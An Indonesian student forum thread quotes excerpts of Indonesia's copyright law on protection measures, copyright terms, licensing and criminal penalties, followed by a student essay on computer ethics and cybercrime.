c. 7 (tujuh) tahun sejak diumumkannya buku di bidang seni dan sastra dan buku itu belum pernah diperbanyak di wilayah Negara Republik Indonesia
(4) Penerjemahan atau Perbanyakan sebagaimana dimaksud pada ayat (1) hanya dapat digunakan untuk pemakaian di dalam wilayah Negara Republik Indonesia dan tidak untuk diekspor ke wilayah Negara lain.
(5) Pelaksanaan ketentuan sebagaimana dimaksud pada ayat (1) huruf b dan huruf c disertai pemberian imbalan yang besarnya ditetapkan dengan Keputusan Presiden.
(6) Ketentuan tentang tata cara pengajuan Permohonan untuk menerjemahkan dan/atau memperbanyak sebagaimana dimaksud pada ayat (1), ayat (2), ayat (3), dan ayat (4) diatur lebih lanjut dengan Keputusan Presiden.
Bagian Kedelapan
Sarana Kontrol Teknologi
Pasal 27

Kecuali atas izin Pencipta, sarana kontrol teknologi sebagai pengaman hak Pencipta tidak diperbolehkan dirusak, ditiadakan, atau dibuat tidak berfungsi.
Pasal 28
(1) Ciptaan-ciptaan yang menggunakan sarana produksi berteknologi tinggi, khususnya di bidang cakram optik (optical disc), wajib memenuhi semua peraturan perizinan dan persyaratan produksi yang ditetapkan oleh instansi yang berwenang.
(2) Ketentuan lebih lanjut mengenai sarana produksi berteknologi tinggi yang memproduksi cakram optik sebagaimana diatur pada ayat (1) diatur dengan Peraturan Pemerintah

BAB III
MASA BERLAKU HAK CIPTA
Pasal 29
(1) Hak Cipta atas Ciptaan:
a. buku, pamflet, dan semua hasil karya tulis lain;
b. drama atau drama musikal, tari, koreografi;
c. segala bentuk seni rupa, seperti seni lukis, seni pahat, dan seni patung;
d. seni batik;
e. lagu atau musik dengan atau tanpa teks; f. arsitektur;
g. ceramah, kuliah, pidato dan Ciptaan sejenis lain;
h. alat peraga;
i. peta;
j. terjemahan, tafsir, saduran, dan bunga rampai berlaku selama hidup Pencipta dan terus berlangsung hingga50 (lima puluh) tahun setelah Pencipta meninggal dunia.
(2) Untuk Ciptaan sebagaimana dimaksud pada ayat (1) yang dimiliki oleh 2 (dua) orang atau lebih, Hak Cipta berlaku selama hidup Pencipta yang meninggal dunia paling akhir dan berlangsung hingga 50 (lima puluh) tahun sesudahnya.

Pasal 30
(1) Hak Cipta atas Ciptaan:
a. Program Komputer;
b. sinematografi;
c. fotografi;
d. database; dan
e. karya hasil pengalihwujudan, berlaku selama 50 (lima puluh) tahun sejak pertama kali diumumkan
(2) Hak Cipta atas perwajahan karya tulis yang diterbitkan berlaku selama 50 (lima puluh) tahun sejak pertama kali diterbitkan.
(3) Hak Cipta atas Ciptaan sebagaimana dimaksud pada ayat (1) dan ayat (2) pasal ini serta Pasal 29 ayat (1) yang dimiliki atau dipegang oleh suatu badan hukum berlaku selama 50 (lima puluh) tahun sejak pertama kali diumumkan.

BAB V LISENSI

Pasal 45
(1) Pemegang Hak Cipta berhak memberikan Lisensi kepada pihak lain berdasarkan surat perjanjian lisensi untuk melaksanakan perbuatan sebagaimana dimaksud dalam Pasal 2.
(2) Kecuali diperjanjikan lain, lingkup Lisensi sebagaimana dimaksud pada ayat (1) meliputi semua perbuatan sebagaimana dimaksud dalam Pasal 2 berlangsung selama jangka waktu Lisensi diberikan dan berlaku untuk seluruh wilayah Negara Republik Indonesia.
(3) Kecuali diperjanjikan lain, pelaksanaan perbuatan sebagaimana dimaksud pada ayat (1) dan ayat (2) disertai dengan kewajiban pemberian royalti kepada Pemegang Hak Cipta oleh penerima Lisensi.
(4) Jumlah royalti yang wajib dibayarkan kepada Pemegang Hak Cipta oleh penerima Lisensi adalah berdasarkan kesepakatan kedua belah pihak dengan berpedoman kepada kesepakatan organisasi profesi.

Pasal 46
Kecuali diperjanjikan lain, Pemegang Hak Cipta tetap boleh melaksanakan sendiri atau memberikan Lisensi kepada pihak ketiga untuk melaksanakan perbuatan sebagaimana dimaksud dalam Pasal 2.

Pasal 47
(1) Perjanjian Lisensi dilarang memuat ketentuan yang dapat menimbulkan akibat yang merugikan perekonomian Indonesia atau memuat ketentuan yang mengakibatkan persaingan usaha tidak sehat sebagaimana diatur dalam peraturan perundang-undangan yang berlaku.
(2) Agar dapat mempunyai akibat hukum terhadap pihak ketiga, perjanjian Lisensi wajib dicatatkan di Direktorat Jenderal.
(3) Direktorat Jenderal wajib menolak pencatatan perjanjian Lisensi yang memuat ketentuan sebagaimana dimaksud pada ayat (1).
(4) Ketentuan lebih lanjut mengenai pencatatan perjanjian Lisensi diatur dengan Keputusan Presiden.

BAB XIII
KETENTUAN PIDANA
Pasal 72
(1) Barangsiapa dengan sengaja dan tanpa hak melakukan perbuatan sebagaimana dimaksud dalam Pasal 2 ayat (1) atau Pasal 49 ayat (1) dan ayat (2) dipidana dengan pidana penjara masing-masing paling singkat 1 (satu) bulan dan/atau denda paling sedikit Rp 1.000.000,00 (satu juta rupiah), atau pidana penjara paling lama 7 (tujuh) tahun dan/atau denda paling banyak Rp 5.000.000.000,00 (lima miliar rupiah).
(2) Barangsiapa dengan sengaja menyiarkan, memamerkan, mengedarkan, atau menjual kepada umum suatu Ciptaan atau barang hasil pelanggaran Hak Cipta atau Hak Terkait sebagaimana dimaksud pada ayat (1) dipidana dengan pidana penjara paling lama 5 (lima) tahun dan/atau denda paling banyak Rp 500.000.000,00 (lima ratus juta rupiah).
(3) Barangsiapa dengan sengaja dan tanpa hak memperbanyak penggunaan untuk kepentingan komersial suatu Program Komputer dipidana dengan pidana penjara paling lama 5 (lima) tahun dan/atau denda paling banyak Rp 500.000.000,00 (lima ratus juta rupiah).
(4) Barangsiapa dengan sengaja melanggar Pasal 17 dipidana dengan pidana penjara paling lama 5 (lima) tahun dan/atau denda paling banyak Rp 1.000.000.000,00 (satu miliar rupiah).
(5) Barangsiapa dengan sengaja melanggar Pasal 19, Pasal 20, atau Pasal 49 ayat (3) dipidana dengan pidana penjara paling lama 2 (dua) tahun dan/atau denda paling banyak Rp 150.000.000,00 (seratus lima puluh juta rupiah).
(6) Barangsiapa dengan sengaja dan tanpa hak melanggar Pasal 24 atau Pasal 55 dipidana dengan pidana penjara paling lama 2 (dua) tahun dan/atau denda paling banyak Rp 150.000.000,00 (seratus lima puluh juta rupiah).
(7) Barangsiapa dengan sengaja dan tanpa hak melanggar Pasal 25 dipidana dengan pidana penjara paling lama 2 (dua) tahun dan/atau denda paling banyak Rp 150.000.000,00 (seratus lima puluh juta rupiah).
(8.) Barangsiapa dengan sengaja dan tanpa hak melanggar Pasal 27 dipidana dengan pidana penjara paling lama 2 (dua) tahun dan/atau denda paling banyak Rp 150.000.000,00 (seratus lima puluh juta rupiah).
(9) Barangsiapa dengan sengaja melanggar Pasal 28 dipidana dengan pidana penjara paling lama 5 (lima) tahun dan/atau denda paling banyak Rp 1.500.000.000,00 (satu miliar lima ratus juta rupiah).

sumber: dwiangger.wordpress.com/undang-undang-haki-bidang-tik/

Lihat profil user

15 Tugas 1 on Sun Apr 15, 2012 11:44 am

KOMPUTER ETIK
April 6th, 2012

Dalam kehidupan zaman sekarang tidak lazim lagi namanya kehidupan di dunia. Saat ini manusia cenderung menggunakan teknologi dunia maya untuk melakukan aktivitasnya. Manusia memanfaatkan teknologi untuk berbisnis, bekerja, berhubungan dengan orang lain, bahkan untuk melakukan tindak kejhatan. Oleh sebab itu kita harus mengenal tentang istilah “KOMPUTER ETIK”. Komputer etik, apa itu computer etik ? Sebagai orang awam mungkin kita tahu tentang computer etik, sebaga pengguna yang baik kita mungkin mengerti tentang etika menggunakan computer itu tidak membuka data – data orang lain, tapi apa hanya sebatas itu pengertian tentang Komputer Etik ? Komputer Etik atau biasa disebut sebagai etika computer bias diartikan sebagai nilai- nilai yang berlaku atau yang perlu diperhatikan dalam menggunakan teknologi tersebut. Dalam kesehariannya banyak sekali pendapat tentang pengertian computer etik, seperti berikut :
1. a. Etika komputer adalah seperangkat asas atau nilai yang berkenaan dengan penggunaan komputer. Etika komputer berasal dari 2 suku kata yaitu etika (bahasa Yunani: ethos) adalah adat istiadat atau kebiasaan yang baik dalam individu, kelompok maupun masyarakat dan komputer (bahasa Inggris: to compute) merupakan alat yang digunakan untuk menghitung dan mengolah data. Jumlah interaksi manusia dengan komputer yang terus meningkat dari waktu ke waktu membuat etika komputer menjadi suatu peraturan dasar yang harus dipahami oleh masyarakat luas. Lahirnya etika komputer sebagai sebuah disiplin ilmu baru dalam bidang teknologi tidak dapat dipisahkan dari permasalahan-permasalahan seputar penggunaan komputer yang meliputi kejahatan komputer, netiket, e-commerce, pelanggaran HAKI (Hak Atas Kekayaan Intelekstual) dan tanggung jawab profesi.(sumber : Wikipedia)
2. b. Etika komputer adalah sebagai analisis mengenai sifat dan dampak sosial teknologi kompuetr, serta formulasi dan justifikasi kebijakan untuk menggunakan teknologi tsb secara etis. Etika komputer juga bisa di definisikan sebuah frase yang sering digunakan namun sulit untuk didefinisikan. Untuk menanamkan kebiasaan komputer yang s esuai, etika harus dijadikan kebijakan organsasi etis. Sejumlah organisasi mengalamatkan isu mengenai etika komputer dan telah menghasilkan guideline etika komputer, kode etik. ( sumber : alexander ragil caesar pada Oktober 19, 2009)
3. c. Etika komputer adalah sebagai analisis mengenai sifat dan dampak sosial teknologi komputer, serta formulasi dan justifikasi kebijakan untuk menggunakan teknologi tersebut secara etis. Etika komputerjuga bisa di definisikan sebuah frase yang sering digunakan namun sulit untuk didefinisikan. Untuk menanamkan kebiasaan komputer yang sesuai, etika harus dijadikan kebijakan organsasi etis. Sejumlah organisasi mengalamatkan isu mengenai etika komputer dan telah menghasilkan guideline etika komputer, kode etik. (sumber : wisnu aditya-blogspot)
Dari beberapa pengertian di atas bisa disimpulkan bahwa computer etik atau etika menggunakan computer itu perlu diketahui bagi para pengguna teknologi ini dimanapun mereka berada, mengapa demikian? Tentu saja karena mengetahui hal – hal yang ada di computer etik itu berate mereka mengetahui hal- hal apa saja yang diperbolehkan atau apa saja yang dilarang pada saat kita menggunakan teknologi ini. Pada dasarnya mengetahui kode etik computer berate akan menghindarkan kita dari segala jenis kejahatan maupun segala jenis kecurangan atau dalam dunia computer biasa disebut dengan Cyber Crime. Cyber Crime terjadi atau semakin marak dilakukan para pengguna teknologi saat ini menurut saya karena beberapa hal, seperti :
1. Mereka benar – benar tidak mengetahui tentang kode etik dalam menggunakan computer dikarenakan mereka tidak peduli dan tidak menghargai hal – hal yang ada di dunia computer,
2. Mereka tahu akan adanya kode etik di dunia computer, akan tetapi mereka tidak perduli akan adanya hal tersebut selama mereka masih mampu meraup keuntungan atas kejahatan yang mereka lakukan walaupun itu melanggar computer etik.
Setelah kita mengetahui sedikit tentang gambaran akibat dari pelanggaran terhadap Komputer Etik, tentu harus mengetahui apa alasan sebenarnya ketika disusun tentang etika memakai computer yang baik dan benar, .Menurut Wahyono (2006) alasan sebenarnya ketika disusun tentang etika memakai computer yang baik dan benar adalah :
1. Bahwa penguna internet berasal dari berbagai negara yang memiliki budaya dan adat yang berbeda beda,
2. Pengguna internet merupakan orang – orang ang hidup dalam anonymouse, yang tidak mengharuskan menyertakan identitas asli,
3. Berbagai macam fasilitas yang tersedia dalam internet memungkinkan seseorang untuk bertindak etis
4. Pengguna internet setiap saat semakin bertambah
Pemerintah Indonesa juga sudah memperhatikan tentang pelanggaran – pelanggaran yang mungkin terjadi akibat melalaikan computer etik, itu terbukti dari adanya undang – undang dalam menggunakan internet yaitu UU RI No.11 tahun 2008 pasal 27,28,29. terutama Pasal 29 yang berbunyi:
“Setiap Orang dengan sengaja dan tanpa hak mengirimkan
Informasi Elektronik dan/atau Dokumen Elektronik yang berisi
ancaman kekerasan atau menakut-nakuti yang ditujukan
secara pribadi.”

Sebagai bahasan terakhir saya memiliki beberapa saran yang berhubungan dengan computer etik, diantaranya :
1. Jangan pernah menggunakan computer untuk melakukan kejahatan terhadap orang lain,
2. Jangan pernah mengintip data – data orang lain,
3. Jangan pernah mencuri hasil karya orang lain dengan crack atau sejenisnya,
4. Jangan menggunakan software sebelum membayar hak ciptanya,
5. Gunakanlah computer dengan penuh tanggung jawab dan komitmen tinggi.

Lihat profil user

16 Tugas on Sun May 06, 2012 3:38 pm

Nim : 10010848
Nama : Ahmad Rubiyanto




Lihat profil user

Sponsored content


Kembali Ke Atas  Message [Halaman 1 dari 1]

Permissions in this forum:
Anda tidak dapat menjawab topik